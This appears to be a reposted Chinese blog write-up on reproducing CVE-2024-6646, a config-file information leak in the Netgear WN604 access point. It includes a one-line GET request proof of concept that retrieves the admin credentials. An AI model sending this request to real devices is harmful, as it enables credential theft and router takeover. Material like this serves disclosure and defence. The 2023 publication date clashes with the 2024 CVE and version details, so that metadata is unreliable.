博客
关于我
Netgear WN604 downloadFile.php 信息泄露漏洞复现(CVE-2024-6646)
阅读量:797 次
发布时间:2023-02-14

本文共 492 字,大约阅读时间需要 1 分钟。

0x01 NETGEAR WN604 产品简介

NETGEAR WN604由NETGEAR公司生产,是一款支持Wi-Fi保护协议(WPA2-PSK, WPA-PSK)和有线等效加密(WEP)64位、128位和152位的无线接入器。此外,该设备还支持MAC地址认证、802.1x RADIUS以及EAP TLS、TTLS、PEAP等安全机制,为用户提供了全面的网络安全保障。

0x02 漏洞概述

在Netgear WN604的downloadFile.php接口中发现了一个信息泄露漏洞。攻击者可通过远程方式获取无线路由器的管理员账号密码,进而控制路由器后台,可能对无线网络造成破坏或发起进一步的威胁。

0x03 影响范围

该漏洞影响Netgear WN604版本号小于等于20240710的设备。

0x04 复现环境

设备运行环境包括:主机名为"Netgear",并支持相关的网络配置。

0x05 漏洞复现

PoC(Proof of Concept)代码如下:

GET /downloadFile.php?file=config HTTP/1.1  Host: User-Agent:

转载地址:http://rbcfk.baihongyu.com/

你可能感兴趣的文章
MySQL:判断逗号分隔的字符串中是否包含某个字符串
查看>>
MySQL:某个ip连接mysql失败次数过多,导致ip锁定
查看>>
MySQL:索引失效场景总结
查看>>
Mysql:避免重复的插入数据方法汇总
查看>>
M_Map工具箱简介及地理图形绘制
查看>>
m_Orchestrate learning system---二十二、html代码如何变的容易
查看>>
n = 3 , while n , continue
查看>>
n 叉树后序遍历转换为链表问题的深入探讨
查看>>
N-Gram的基本原理
查看>>
n1 c语言程序,全国青少年软件编程等级考试C语言经典程序题10道七
查看>>
nacos config
查看>>
Nacos Derby 远程命令执行漏洞(QVD-2024-26473)
查看>>
Nacos 与 Eureka、Zookeeper 和 Consul 等其他注册中心的区别
查看>>
Nacos2.X 配置中心源码分析:客户端如何拉取配置、服务端配置发布客户端监听机制
查看>>
NacosClient客户端搭建,微服务注册进nacos
查看>>
Nacos使用OpenFeign
查看>>
Nacos做注册中心使用
查看>>
Nacos做配置中心使用
查看>>
Nacos原理
查看>>
Nacos发布0.5.0版本,轻松玩转动态 DNS 服务
查看>>